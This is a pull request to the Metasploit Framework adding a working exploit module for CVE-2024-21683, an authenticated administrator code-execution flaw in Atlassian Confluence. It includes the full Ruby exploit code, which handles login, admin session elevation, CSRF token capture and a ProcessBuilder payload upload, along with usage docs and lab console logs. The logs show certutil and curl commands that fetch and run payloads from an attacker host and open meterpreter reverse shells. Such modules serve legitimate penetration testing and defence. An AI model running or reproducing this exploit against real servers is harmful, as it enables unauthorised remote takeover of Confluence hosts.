### PR TITLE
Exploit module for CVE-2024-21683 - Atlassian Confluence administrator-level RCE

### DIFF
--- a/documentation/modules/exploit/multi/http/atlassian_confluence_rce_cve_2024_21683.md
+++ b/documentation/modules/exploit/multi/http/atlassian_confluence_rce_cve_2024_21683.md
@@ -38,7 +38,7 @@ The known Confluence administrator password.
 
 ## Scenarios
 
-### Windows Target
+### Windows Server 2022 (10.0 Build 20348)
 ```
 msf6 exploit(multi/http/atlassian_confluence_rce_cve_2024_21683) > set payload cmd/windows/http/x64/meterpreter/reverse_tcp
 payload => cmd/windows/http/x64/meterpreter/reverse_tcp
@@ -87,10 +87,17 @@ meterpreter > getuid
 Server username: SRV01\Administrator
 meterpreter > pwd
 C:\Program Files\Atlassian\Confluence\bin
-meterpreter >
+meterpreter > sysinfo
+Computer        : SRV01
+OS              : Windows Server 2022 (10.0 Build 20348).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 1
+Meterpreter     : x64/windows
 ```
 
-### Linux Target
+### Ubuntu 22.04 (Linux 6.5.0-41-generic)
 ```
 msf6 exploit(multi/http/atlassian_confluence_rce_cve_2024_21683) > set ADMIN_USER admin
 ADMIN_USER => admin
@@ -129,5 +136,11 @@ meterpreter > getuid
 Server username: confluence
 meterpreter > pwd
 /atlassian-confluence-8.9.0
+meterpreter > sysinfo
+Computer     : 192.168.156.133
+OS           : Ubuntu 22.04 (Linux 6.5.0-41-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
 meterpreter > 
 ```

--- a/documentation/modules/exploit/multi/http/atlassian_confluence_rce_cve_2024_21683.md
+++ b/documentation/modules/exploit/multi/http/atlassian_confluence_rce_cve_2024_21683.md
@@ -1,0 +1,133 @@
+## Vulnerable Application
+This module exploits an authenticated administrator-level vulnerability in Atlassian Confluence,
+tracked as CVE-2024-21683. The vulnerability exists due to the Rhino script engine parser evaluating
+tainted data from uploaded text files. This facilitates arbitrary code execution. This exploit will
+authenticate, validate user privileges, extract the underlying host OS information, then trigger
+remote code execution. All versions of Confluence prior to 7.17 are affected, as are many versions
+up to 8.9.0.
+
+## Testing
+Download and install a [vulnerable version of Atlassian Confluence](https://www.atlassian.com/software/confluence/download-archives).
+By default, Confluence serves an HTTP service on TCP port 8090. This module was tested against four Confluence installs:
+Linux and Windows Confluence hosts running two different versions, 8.9.0 and 7.20.2. The target host operating systems
+were Ubuntu 22.04 and Server 2022.
+
+## Verification Steps
+Note: Disable Defender if you are using the default payloads.
+
+Steps:
+1. Start msfconsole
+2. `use exploit/multi/http/atlassian_confluence_rce_cve_2024_21683`
+3. `set RHOST 192.168.156.131`
+4. `check`
+5. `set LHOST 192.168.156.129`
+6. `set ADMIN_USER admin`
+7. `set ADMIN_PASS Password123!`
+8. For Windows targets, `set FETCH_COMMAND CERTUTIL` is recommended. For Linux targets, `set FETCH_COMMAND CURL` is recommended.
+9. `exploit`
+
+## Options
+
+### ADMIN_USER
+
+The known Confluence administrator username.
+
+### ADMIN_PASS
+
+The known Confluence administrator password.
+
+## Scenarios
+
+### Windows Target
+```
+msf6 exploit(multi/http/atlassian_confluence_rce_cve_2024_21683) > set payload cmd/windows/http/x64/meterpreter/reverse_tcp
+payload => cmd/windows/http/x64/meterpreter/reverse_tcp
+msf6 exploit(multi/http/atlassian_confluence_rce_cve_2024_21683) > set ADMIN_USER admin
+ADMIN_USER => admin
+msf6 exploit(multi/http/atlassian_confluence_rce_cve_2024_21683) > set ADMIN_PASS Password123!
+ADMIN_PASS => Password123!
+msf6 exploit(multi/http/atlassian_confluence_rce_cve_2024_21683) > set LHOST 192.168.156.129
+LHOST => 192.168.156.129
+msf6 exploit(multi/http/atlassian_confluence_rce_cve_2024_21683) > set FETCH_COMMAND CERTUTIL 
+FETCH_COMMAND => CERTUTIL
+msf6 exploit(multi/http/atlassian_confluence_rce_cve_2024_21683) > set FETCH_SRVHOST 192.168.156.129
+FETCH_SRVHOST => 192.168.156.129
+msf6 exploit(multi/http/atlassian_confluence_rce_cve_2024_21683) > set RHOSTS 192.168.156.131
+RHOSTS => 192.168.156.131
+msf6 exploit(multi/http/atlassian_confluence_rce_cve_2024_21683) > check
+[*] 192.168.156.131:8090 - The target appears to be vulnerable. Exploitable version of Confluence: 7.20.2
+msf6 exploit(multi/http/atlassian_confluence_rce_cve_2024_21683) > set VERBOSE true
+VERBOSE => true
+msf6 exploit(multi/http/atlassian_confluence_rce_cve_2024_21683) > run
+
+[*] Command to run on remote host: certutil -urlcache -f http://192.168.156.129:8080/h2Wbt3lK1eTiVRc3SNDL1w %TEMP%\iYgswSHqZU.exe & start /B %TEMP%\iYgswSHqZU.exe
+[*] Fetch handler listening on 192.168.156.129:8080
+[*] HTTP server started
+[*] Adding resource /h2Wbt3lK1eTiVRc3SNDL1w
+[*] Started reverse TCP handler on 192.168.156.129:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Exploitable version of Confluence: 7.20.2
+[*] Successfully authenticated to Confluence
+[*] The provided user is an administrator
+[*] Secure Administrator Sessions enabled - elevating session
+[*] Grabbed elevation CSRF token: a8fc89e32b0baa5f6d72247e614e37bdf11c33c4
+[*] Administrator session has been elevated
+[*] Target returned the operating system string 'Windows Server 2022 10.0'
+[*] Grabbed macro CSRF token: de21269d58ebd338bed3a2bd15a4c54fe321785b
+[*] Crafted ProcessBuilder payload string: new java.lang.ProcessBuilder("cmd.exe", "/c", new java.lang.String(java.util.Base64.getDecoder().decode('Y2VydHV0aWwgLXVybGNhY2hlIC1mIGh0dHA6Ly8xOTIuMTY4LjE1Ni4xMjk6ODA4MC9oMldidDNsSzFlVGlWUmMzU05ETDF3ICVURU1QJVxpWWdzd1NIcVpVLmV4ZSAmIHN0YXJ0IC9CICVURU1QJVxpWWdzd1NIcVpVLmV4ZQ=='))).start()
+[*] Sending POST request to trigger code execution
+[*] Client 192.168.156.131 requested /h2Wbt3lK1eTiVRc3SNDL1w
+[*] Sending payload to 192.168.156.131 (Microsoft-CryptoAPI/10.0)
+[*] Client 192.168.156.131 requested /h2Wbt3lK1eTiVRc3SNDL1w
+[*] Sending payload to 192.168.156.131 (CertUtil URL Agent)
+[*] Sending stage (201798 bytes) to 192.168.156.131
+[*] Meterpreter session 1 opened (192.168.156.129:4444 -> 192.168.156.131:51064) at 2024-07-09 10:19:08 -0500
+
+meterpreter > getuid
+Server username: SRV01\Administrator
+meterpreter > pwd
+C:\Program Files\Atlassian\Confluence\bin
+meterpreter >
+```
+
+### Linux Target
+```
+msf6 exploit(multi/http/atlassian_confluence_rce_cve_2024_21683) > set ADMIN_USER admin
+ADMIN_USER => admin
+msf6 exploit(multi/http/atlassian_confluence_rce_cve_2024_21683) > set ADMIN_PASS Password123!
+ADMIN_PASS => Password123!
+msf6 exploit(multi/http/atlassian_confluence_rce_cve_2024_21683) > set RHOSTS 192.168.156.133
+RHOSTS => 192.168.156.133
+msf6 exploit(multi/http/atlassian_confluence_rce_cve_2024_21683) > check
+[*] 192.168.156.133:8090 - The target appears to be vulnerable. Exploitable version of Confluence: 8.9.0
+msf6 exploit(multi/http/atlassian_confluence_rce_cve_2024_21683) > set FETCH_COMMAND CURL
+FETCH_COMMAND => CURL
+msf6 exploit(multi/http/atlassian_confluence_rce_cve_2024_21683) > set VERBOSE true
+VERBOSE => true
+msf6 exploit(multi/http/atlassian_confluence_rce_cve_2024_21683) > run
+
+[*] Command to run on remote host: curl -so ./UyvwIjHwXcB http://192.168.156.129:8080/zR2OIDxwf8sUzl-Aq0rIXg; chmod +x ./UyvwIjHwXcB; ./UyvwIjHwXcB &
+[*] Fetch handler listening on 192.168.156.129:8080
+[*] HTTP server started
+[*] Adding resource /zR2OIDxwf8sUzl-Aq0rIXg
+[*] Started reverse TCP handler on 192.168.156.129:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Exploitable version of Confluence: 8.9.0
+[*] Successfully authenticated to Confluence
+[*] The provided user is an administrator
+[*] Target returned the operating system string 'Linux 6.5.0-41-generic'
+[*] Grabbed macro CSRF token: 671809d94b9274550326b77f1618381188952a53
+[*] Crafted ProcessBuilder payload string: new java.lang.ProcessBuilder("/bin/sh", "-c", new java.lang.String(java.util.Base64.getDecoder().decode('Y3VybCAtc28gLi9VeXZ3SWpId1hjQiBodHRwOi8vMTkyLjE2OC4xNTYuMTI5OjgwODAvelIyT0lEeHdmOHNVemwtQXEwcklYZzsgY2htb2QgK3ggLi9VeXZ3SWpId1hjQjsgLi9VeXZ3SWpId1hjQiAm'))).start()
+[*] Sending POST request to trigger code execution
+[*] Client 192.168.156.133 requested /zR2OIDxwf8sUzl-Aq0rIXg
+[*] Sending payload to 192.168.156.133 (curl/7.81.0)
+[*] Transmitting intermediate stager...(126 bytes)
+[*] Sending stage (3045380 bytes) to 192.168.156.133
+[*] Meterpreter session 1 opened (192.168.156.129:4444 -> 192.168.156.133:60308) at 2024-07-09 10:40:32 -0500
+
+meterpreter > getuid
+Server username: confluence
+meterpreter > pwd
+/atlassian-confluence-8.9.0
+meterpreter > 
+```

--- a/modules/exploits/multi/http/atlassian_confluence_rce_cve_2024_21683.rb
+++ b/modules/exploits/multi/http/atlassian_confluence_rce_cve_2024_21683.rb
@@ -85,6 +85,8 @@ class MetasploitModule < Msf::Exploit::Remote
        # According to Atlassian, all versions < 7.17 are vulnerable.
        version.between?(Rex::Version.new('0.0.0'), Rex::Version.new('7.16.999'))
       Exploit::CheckCode::Appears("Exploitable version of Confluence: #{version}")
+    else
+      Exploit::CheckCode::Safe("Non-exploitable version of Confluence: #{version}")
     end
   end
 

--- a/modules/exploits/multi/http/atlassian_confluence_rce_cve_2024_21683.rb
+++ b/modules/exploits/multi/http/atlassian_confluence_rce_cve_2024_21683.rb
@@ -211,7 +211,7 @@ class MetasploitModule < Msf::Exploit::Remote
     fail_with(Failure::Unknown, 'Target did not respond as expected during code execution attempt') unless res_upload
 
     # If the response to the multipart request does not return a 200.
-    fail_with(Failure::Unknown, 'The application returned a non-200 response during code execution attempt') unless res_upload.code == 200
+    print_error(Failure::Unknown, 'The application returned a non-200 response during code execution attempt') unless res_upload.code == 200
   end
 
   def exploit

--- a/modules/exploits/multi/http/atlassian_confluence_rce_cve_2024_21683.rb
+++ b/modules/exploits/multi/http/atlassian_confluence_rce_cve_2024_21683.rb
@@ -184,10 +184,10 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # Initialize a multipart form.
     payload_form = Rex::MIME::Message.new
-    
+
     # ProcessBuilder string - this will inject the sh/cmd.exe sequence as the first two args and decode the base64 msf fetch payload as the third.
     payload_string = "new java.lang.ProcessBuilder(#{shell}, new java.lang.String(java.util.Base64.getDecoder().decode('#{Rex::Text.encode_base64(payload.encoded)}'))).start()"
-    
+
     # Add the CSRF token, payload file, and 'newLanguageName' value. Both the 'languageFile' name and the 'newLanguageName' value can be any string.
     payload_form.add_part(csrf_macro, 'text/plain', 'binary', 'form-data; name="atl_token"')
     payload_form.add_part(payload_string, 'text/plain', 'binary', "form-data; name=\"languageFile\"; filename=\"#{rand_text_hex(10)}\"")

--- a/modules/exploits/multi/http/atlassian_confluence_rce_cve_2024_21683.rb
+++ b/modules/exploits/multi/http/atlassian_confluence_rce_cve_2024_21683.rb
@@ -155,7 +155,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     vprint_status("Grabbed #{operation} CSRF token: #{csrf_token}")
 
-    return csrf_token
+    csrf_token
   end
 
   def get_host_os
@@ -177,7 +177,7 @@ class MetasploitModule < Msf::Exploit::Remote
     vprint_status("Target returned the operating system string '#{os}'")
 
     # If the string begins with "win", assume the host is Windows. If it's anything else, assume it's something Unix-based.
-    return os.downcase.start_with?('win') ? 'win' : 'nix'
+    os.downcase.start_with?('win') ? 'win' : 'nix'
   end
 
   def upload_payload(shell)
@@ -208,10 +208,10 @@ class MetasploitModule < Msf::Exploit::Remote
     )
 
     # Connection failure, no response, or malformed response.
-    fail_with(Failure::Unknown, 'Target did not respond as expected during code execution attempt') unless res_upload
+    print_error('Target did not respond as expected during code execution attempt') unless res_upload
 
     # If the response to the multipart request does not return a 200.
-    print_error(Failure::Unknown, 'The application returned a non-200 response during code execution attempt') unless res_upload.code == 200
+    print_error('The application returned a non-200 response during code execution attempt') unless res_upload.code == 200
   end
 
   def exploit

--- a/modules/exploits/multi/http/atlassian_confluence_rce_cve_2024_21683.rb
+++ b/modules/exploits/multi/http/atlassian_confluence_rce_cve_2024_21683.rb
@@ -1,0 +1,264 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::HTTP::Atlassian::Confluence::Version
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Atlassian Confluence Administrator Code Macro Remote Code Execution',
+        'Description' => %q{
+          This module exploits an authenticated administrator-level vulnerability in Atlassian Confluence,
+          tracked as CVE-2024-21683. The vulnerability exists due to the Rhino script engine parser evaluating
+          tainted data from uploaded text files. This facilitates arbitrary code execution. This exploit will
+          authenticate, validate user privileges, extract the underlying host OS information, then trigger
+          remote code execution. All versions of Confluence prior to 7.17 are affected, as are many versions
+          up to 8.9.0.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Ankita Sawlani', # Discovery
+          'Huong Kieu', # Public Analysis
+          'W01fh4cker', # PoC Exploit
+          'remmons-r7'  # MSF Exploit
+        ],
+        'References' => [
+          ['CVE', '2024-21683'],
+          ['URL', 'https://jira.atlassian.com/browse/CONFSERVER-95832'],
+          ['URL', 'https://realalphaman.substack.com/p/quick-note-about-cve-2024-21683-authenticated'],
+          ['URL', 'https://github.com/W01fh4cker/CVE-2024-21683-RCE']
+        ],
+        'DisclosureDate' => '2024-05-21',
+        'Privileged' => false, # `NT AUTHORITY\NETWORK SERVICE` on Windows by default, `confluence` on Linux by default.
+        'Platform' => ['unix', 'linux', 'win'],
+        'Arch' => [ARCH_CMD],
+        'DefaultTarget' => 0,
+        'Targets' => [ [ 'Default', {} ] ],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          # The access log files will contain requests to the exploitable administrator dashboard endpoints.
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
+
+    register_options(
+      [
+        # By default, Confluence serves an HTTP service on TCP port 8090.
+        Opt::RPORT(8090),
+        OptString.new('TARGETURI', [true, 'The URI path to Confluence', '/']),
+        OptString.new('ADMIN_USER', [true, 'The Confluence administrator username', '']),
+        OptString.new('ADMIN_PASS', [true, 'The Confluence administrator password', ''])
+      ]
+    )
+  end
+
+  def check
+    # Begin by retrieving the version string from the login page.
+    version = get_confluence_version
+    return CheckCode::Unknown('Failed to determine the Confluence version') unless version
+
+    # Check the extracted version against all documented vulnerable versions.
+    if version == Rex::Version.new('8.9.0') ||
+       version.between?(Rex::Version.new('8.8.0'), Rex::Version.new('8.8.1')) ||
+       version.between?(Rex::Version.new('8.7.0'), Rex::Version.new('8.7.2')) ||
+       version.between?(Rex::Version.new('8.6.0'), Rex::Version.new('8.6.2')) ||
+       version.between?(Rex::Version.new('8.5.0'), Rex::Version.new('8.5.8')) ||
+       version.between?(Rex::Version.new('8.4.0'), Rex::Version.new('8.4.5')) ||
+       version.between?(Rex::Version.new('8.3.0'), Rex::Version.new('8.3.4')) ||
+       version.between?(Rex::Version.new('8.2.0'), Rex::Version.new('8.2.3')) ||
+       version.between?(Rex::Version.new('8.1.0'), Rex::Version.new('8.1.4')) ||
+       version.between?(Rex::Version.new('8.0.0'), Rex::Version.new('8.0.4')) ||
+       version.between?(Rex::Version.new('7.20.0'), Rex::Version.new('7.20.3')) ||
+       version.between?(Rex::Version.new('7.19.0'), Rex::Version.new('7.19.21')) ||
+       version.between?(Rex::Version.new('7.18.0'), Rex::Version.new('7.18.3')) ||
+       version.between?(Rex::Version.new('7.17.0'), Rex::Version.new('7.17.5')) ||
+       # According to Atlassian, all versions < 7.17 are vulnerable.
+       version.between?(Rex::Version.new('0.0.0'), Rex::Version.new('7.16.999'))
+      Exploit::CheckCode::Appears("Exploitable version of Confluence: #{version}")
+    end
+  end
+
+  def login(username, password)
+    # Perform a POST request to login to Confluence with the provided credentials.
+    send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'dologin.action'),
+      'keep_cookies' => 'true',
+      'vars_post' => {
+        'os_username' => username,
+        'os_password' => password,
+        'os_destination' => '%2FXsuccessX'
+      }
+    )
+  end
+
+  def elevate
+    # Elevates the current administrator session. By default, administrator sessions will remain elevated for two minutes after this takes place.
+    vprint_status('Secure Administrator Sessions enabled - elevating session')
+
+    # Grab a CSRF token from the elevation page form.
+    csrf_elevation = get_csrf('doauthenticate.action', 'elevation')
+
+    # With the valid elevation token, escalate the current administrator session.
+    res_elevate = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'doauthenticate.action'),
+      'keep_cookies' => 'true',
+      'vars_post' => {
+        'atl_token' => csrf_elevation,
+        'password' => datastore['ADMIN_PASS'],
+        'authenticate' => 'Confirm',
+        'destination' => '%2FXsuccessX'
+      }
+    )
+
+    # Connection failure, no response, or malformed response.
+    fail_with(Failure::Unknown, 'Target did not respond as expected during privilege elevation') unless res_elevate
+
+    # Confirm that the response indicates a successful elevation.
+    fail_with(Failure::UnexpectedReply, 'The session elevation appears to have failed') unless res_elevate.code == 302 && res_elevate.headers['Location'].include?('XsuccessX')
+
+    vprint_status('Administrator session has been elevated')
+  end
+
+  def get_csrf(page, operation)
+    # Perform a GET request to the target page to grab a CSRF token.
+    res_get_csrf = send_request_cgi(
+      'method' => 'GET',
+      'keep_cookies' => 'true',
+      'uri' => normalize_uri(target_uri.path, page)
+    )
+
+    # Connection failure, no response, or malformed response.
+    fail_with(Failure::Unknown, "Target did not respond as expected when fetching #{operation} CSRF token") unless res_get_csrf
+
+    # If the response is not 200 and does not contain the string "atl_token", the target page has behaved unexpectedly.
+    fail_with(Failure::UnexpectedReply, "Target returned a response that did not contain #{operation} CSRF token") unless res_get_csrf.code == 200 && res_get_csrf.body.include?('atl_token')
+
+    # Response page should contain '<input type="hidden" name="atl_token" value="tokenhere">'.
+    csrf_token = res_get_csrf.get_xml_document.xpath('//input[@name="atl_token"]').first&.values&.[](2)
+
+    # Token should be 40 characters.
+    fail_with(Failure::UnexpectedReply, "Target did not return the expected 40-character #{operation} CSRF token") unless csrf_token&.length == 40
+
+    vprint_status("Grabbed #{operation} CSRF token: #{csrf_token}")
+
+    return csrf_token
+  end
+
+  def get_host_os
+    # Elevated Confluence administrators can view system information, which will be used to confirm the target OS.
+    res_sysinfo = send_request_cgi(
+      'method' => 'GET',
+      'keep_cookies' => 'true',
+      'uri' => normalize_uri(target_uri.path, 'admin', 'systeminfo.action')
+    )
+
+    # Connection failure, no response, or malformed response.
+    fail_with(Failure::Unknown, 'Target did not respond as expected while getting host OS') unless res_sysinfo
+
+    # Confirm that the response is the expected system info page.
+    fail_with(Failure::UnexpectedReply, 'The system information page failed to return the expected data') unless res_sysinfo.code == 200 && res_sysinfo.body.include?('operating.system')
+
+    # Extract the OS string from the response DOM.
+    os = res_sysinfo.get_xml_document.xpath('//span[@id="operating.system"]').first&.text
+    vprint_status("Target returned the operating system string '#{os}'")
+
+    # If the string begins with "win", assume the host is Windows. If it's anything else, assume it's something Unix-based.
+    return os.downcase.start_with?('win') ? 'win' : 'nix'
+  end
+
+  def upload_payload(shell)
+    # Grab a valid macro dashboard CSRF token.
+    csrf_macro = get_csrf('/admin/plugins/newcode/configure.action', 'macro')
+
+    # Initialize a multipart form.
+    payload_form = Rex::MIME::Message.new
+    
+    # ProcessBuilder string - this will inject the sh/cmd.exe sequence as the first two args and decode the base64 msf fetch payload as the third.
+    payload_string = "new java.lang.ProcessBuilder(#{shell}, new java.lang.String(java.util.Base64.getDecoder().decode('#{Rex::Text.encode_base64(payload.encoded)}'))).start()"
+    
+    # Add the CSRF token, payload file, and 'newLanguageName' value. Both the 'languageFile' name and the 'newLanguageName' value can be any string.
+    payload_form.add_part(csrf_macro, 'text/plain', 'binary', 'form-data; name="atl_token"')
+    payload_form.add_part(payload_string, 'text/plain', 'binary', "form-data; name=\"languageFile\"; filename=\"#{rand_text_hex(10)}\"")
+    payload_form.add_part(rand_text_hex(10), 'text/plain', 'binary', 'form-data; name="newLanguageName"')
+
+    vprint_status("Crafted ProcessBuilder payload string: #{payload_string}")
+    vprint_status('Sending POST request to trigger code execution')
+
+    # POST the multipart form for code execution. A neutral error will be returned in the web response, which we can ignore.
+    res_upload = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'admin', 'plugins', 'newcode', 'addlanguage.action'),
+      'keep_cookies' => 'true',
+      'ctype' => "multipart/form-data; boundary=#{payload_form.bound}",
+      'data' => payload_form.to_s
+    )
+
+    # Connection failure, no response, or malformed response.
+    fail_with(Failure::Unknown, 'Target did not respond as expected during code execution attempt') unless res_upload
+
+    # If the response to the multipart request does not return a 200.
+    fail_with(Failure::Unknown, 'The application returned a non-200 response during code execution attempt') unless res_upload.code == 200
+  end
+
+  def exploit
+    # Authenticate to Confluence.
+    res_login = login(datastore['ADMIN_USER'], datastore['ADMIN_PASS'])
+
+    # Connection failure, no response, or malformed response.
+    fail_with(Failure::Unknown, 'Target did not respond as expected during authentication') unless res_login
+
+    # If authentication does not result in a redirect with the provided "XsuccessX" 'Location' header value.
+    fail_with(Failure::BadConfig, 'The target did not accept the provided credentials') unless res_login.code == 302 && res_login.headers['Location'].include?('XsuccessX')
+
+    vprint_status('Successfully authenticated to Confluence')
+
+    # Attempt to fetch a privileged page with the provided valid credentials to confirm the user is an administrator.
+    res_check_admin = send_request_cgi(
+      'method' => 'GET',
+      'keep_cookies' => 'true',
+      'uri' => normalize_uri(target_uri.path, 'admin', 'console.action')
+    )
+
+    # Connection failure, no response, or malformed response.
+    fail_with(Failure::Unknown, 'Target did not respond as expected during privilege check') unless res_check_admin
+
+    # If a 'Location' header is returned in the response, the current session doesn't have full privileges.
+    if res_check_admin.headers['Location']
+
+      # Confluence will redirect to the login page if the current user does not have admin privileges, so check for that here.
+      if res_check_admin.headers['Location'].include?('login.action')
+        fail_with(Failure::BadConfig, 'The provided credentials are valid, but the user does not have administrative privileges')
+      end
+
+      vprint_status('The provided user is an administrator')
+
+      # Check whether Secure Administrator Sessions feature (sudo-like elevation prompt) is enabled. This feature is default on newer versions.
+      if res_check_admin.headers['Location'].include?('authenticate.action')
+        elevate
+      end
+
+    # User is an administrator and Secure Administrator Sessions is disabled.
+    else
+      vprint_status('The provided user is an administrator')
+    end
+
+    # As an administrator, check the host OS for selection between sh/cmd.exe in payload
+    shell = get_host_os == 'win' ? '"cmd.exe", "/c"' : '"/bin/sh", "-c"'
+
+    # Upload a text file containing a payload to be evaluated by the script engine
+    upload_payload(shell)
+  end
+
+end


### PR DESCRIPTION
This module exploits an authenticated administrator-level vulnerability in Atlassian Confluence, tracked as CVE-2024-21683. The vulnerability exists due to the Rhino script engine evaluating tainted data from uploaded text files. This facilitates arbitrary code execution. This exploit will authenticate, validate user privileges, extract the underlying host OS information, then trigger remote code execution. All versions of Confluence prior to 7.17 are affected, as are many versions up to 8.9.0.

## Verification

1. Start msfconsole
2. `use exploit/multi/http/atlassian_confluence_rce_cve_2024_21683`
3. `set RHOST 192.168.156.131`
4. `check`
5. `set LHOST 192.168.156.129`
6. `set ADMIN_USER admin`
7. `set ADMIN_PASS Password123!`
8. For Windows targets: `set FETCH_COMMAND CERTUTIL`. For Linux targets: `set FETCH_COMMAND CURL`
9. `exploit`

## Example usage
```
msf6 exploit(multi/http/atlassian_confluence_rce_cve_2024_21683) > set payload cmd/windows/http/x64/meterpreter/reverse_tcp
payload => cmd/windows/http/x64/meterpreter/reverse_tcp
msf6 exploit(multi/http/atlassian_confluence_rce_cve_2024_21683) > set ADMIN_USER admin
ADMIN_USER => admin
msf6 exploit(multi/http/atlassian_confluence_rce_cve_2024_21683) > set ADMIN_PASS Password123!
ADMIN_PASS => Password123!
msf6 exploit(multi/http/atlassian_confluence_rce_cve_2024_21683) > set LHOST 192.168.156.129
LHOST => 192.168.156.129
msf6 exploit(multi/http/atlassian_confluence_rce_cve_2024_21683) > set FETCH_COMMAND CERTUTIL 
FETCH_COMMAND => CERTUTIL
msf6 exploit(multi/http/atlassian_confluence_rce_cve_2024_21683) > set FETCH_SRVHOST 192.168.156.129
FETCH_SRVHOST => 192.168.156.129
msf6 exploit(multi/http/atlassian_confluence_rce_cve_2024_21683) > set RHOSTS 192.168.156.131
RHOSTS => 192.168.156.131
msf6 exploit(multi/http/atlassian_confluence_rce_cve_2024_21683) > check
[*] 192.168.156.131:8090 - The target appears to be vulnerable. Exploitable version of Confluence: 7.20.2
msf6 exploit(multi/http/atlassian_confluence_rce_cve_2024_21683) > set VERBOSE true
VERBOSE => true
msf6 exploit(multi/http/atlassian_confluence_rce_cve_2024_21683) > run

[*] Command to run on remote host: certutil -urlcache -f http://192.168.156.129:8080/h2Wbt3lK1eTiVRc3SNDL1w %TEMP%\iYgswSHqZU.exe & start /B %TEMP%\iYgswSHqZU.exe
[*] Fetch handler listening on 192.168.156.129:8080
[*] HTTP server started
[*] Adding resource /h2Wbt3lK1eTiVRc3SNDL1w
[*] Started reverse TCP handler on 192.168.156.129:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Exploitable version of Confluence: 7.20.2
[*] Successfully authenticated to Confluence
[*] The provided user is an administrator
[*] Secure Administrator Sessions enabled - elevating session
[*] Grabbed elevation CSRF token: a8fc89e32b0baa5f6d72247e614e37bdf11c33c4
[*] Administrator session has been elevated
[*] Target returned the operating system string 'Windows Server 2022 10.0'
[*] Grabbed macro CSRF token: de21269d58ebd338bed3a2bd15a4c54fe321785b
[*] Crafted ProcessBuilder payload string: new java.lang.ProcessBuilder("cmd.exe", "/c", new java.lang.String(java.util.Base64.getDecoder().decode('Y2VydHV0aWwgLXVybGNhY2hlIC1mIGh0dHA6Ly8xOTIuMTY4LjE1Ni4xMjk6ODA4MC9oMldidDNsSzFlVGlWUmMzU05ETDF3ICVURU1QJVxpWWdzd1NIcVpVLmV4ZSAmIHN0YXJ0IC9CICVURU1QJVxpWWdzd1NIcVpVLmV4ZQ=='))).start()
[*] Sending POST request to trigger code execution
[*] Client 192.168.156.131 requested /h2Wbt3lK1eTiVRc3SNDL1w
[*] Sending payload to 192.168.156.131 (Microsoft-CryptoAPI/10.0)
[*] Client 192.168.156.131 requested /h2Wbt3lK1eTiVRc3SNDL1w
[*] Sending payload to 192.168.156.131 (CertUtil URL Agent)
[*] Sending stage (201798 bytes) to 192.168.156.131
[*] Meterpreter session 1 opened (192.168.156.129:4444 -> 192.168.156.131:51064) at 2024-07-09 10:19:08 -0500

meterpreter > getuid
Server username: SRV01\Administrator
meterpreter > pwd
C:\Program Files\Atlassian\Confluence\bin
meterpreter >
```
I'll privately share a capture of the module running with a member of the Metasploit team. Thank you!